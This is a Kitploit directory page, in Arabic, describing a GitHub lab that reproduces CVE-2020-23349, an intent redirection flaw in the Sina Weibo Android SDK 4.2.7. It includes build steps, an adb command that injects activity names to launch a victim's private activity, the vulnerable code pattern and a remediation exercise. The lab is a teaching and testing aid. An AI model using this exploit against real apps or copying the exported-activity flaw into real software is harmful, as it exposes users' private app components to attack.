Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-23349_Lab — مختبر أندرويد تعليمي لـ CVE-2020-23349 في Sina Weibo SDK 4.2.7 | Kitploit
أدوات/GitHubGitHub/lazybear8372/cve-2020-23349_lab
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالاختبار اختراق تطبيقات الجوالأمن الجوالالتعلم والتعليممختبرات وتدريب عملي
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

مختبر أندرويد تعليمي لـ CVE-2020-23349 في Sina Weibo SDK 4.2.7

عرض المستودع
9منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر CVE-2020-23349 لنظام Android

مشروع تعليمي لإعادة إنتاج ثغرة إعادة توجيه النوايا (Intent Redirection) في حزمة تطوير Sina Weibo لنظام Android SDK 4.2.7 محليًا.

استخدمه فقط على أجهزة اختبار أو محاكيات مصرح بها. لا ينبغي استخدامه ضد تطبيقات المستخدمين الحقيقية.

البنية

  • victim: التطبيق الضعيف الذي يتضمن ملف openDefault-4.2.7.aar الفعلي
  • attacker: تطبيق الهجوم الذي يستدعي النشاط المُصدَّر WbShareTransActivity
  • victim/.../PrivateActivity: هدف إعادة الإنتاج مع android:exported="false"

مسار الثغرة كالتالي:

root@kitploit:~
تطبيق Attacker
  -> WbShareTransActivity المُصدَّر
  -> startActivity/gotoActivity من Intent Extra
  -> تنفيذ PrivateActivity الخاص بـ victim

البناء

يتطلب Android SDK 36 و JDK 17.

root@kitploit:~
./gradlew clean assembleDebug

الملفات الناتجة:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

التثبيت وإعادة الإنتاج

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. شغّل تطبيق Victim مرة واحدة إذا لزم الأمر.
  2. اضغط على زر Launch private Activity في تطبيق Attacker.
  3. إذا ظهرت شاشة EXPLOIT SUCCESS، فقد نجحت إعادة الإنتاج.

يمكنك أيضًا إعادة الإنتاج مباشرة عبر ADB.

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

لماذا تعمل الثغرة

يثق SDK 4.2.7 في السلسلتين startActivity وgotoActivity القادمتين من Intent خارجي ويستخدمهما بالشكل التالي:

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

بما أن this هو سياق تطبيق Victim، فإن Android يتعامل مع الأمر على أنه قيام تطبيق Victim بتشغيل نشاطه الخاص PrivateActivity.

في إصدارات Android الحديثة، يجب التصريح بـ android:exported، لذلك يحدد هذا المشروع القيمة true صراحةً في victim/AndroidManifest.xml لإعادة إنتاج الحالة الضمنية للتصدير في حزمة SDK القديمة.

تمرين المعالجة

في التمارين التي لا تتطلب ميزة المشاركة، غيّر القيم التالية إلى false وأعد البناء.

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

بعد ذلك، سيتم حظر الهجوم نفسه عبر SecurityException. في المنتجات الفعلية، يجب إزالة Weibo SDK 4.x والترقية إلى أحدث إصدار مدعوم.

مصدر حزمة SDK

ملف AAR المضمّن مأخوذ من إصدار 4.2.7 في المستودع الرسمي العام لـ Sina Weibo.

  • المستودع: https://github.com/sinaweibosdk/weibo_android_sdk
  • الإصدار: 99daf8a (4.2.7)
  • الملف: 新文档/openDefault-4.2.7.aar
تنزيل الأداة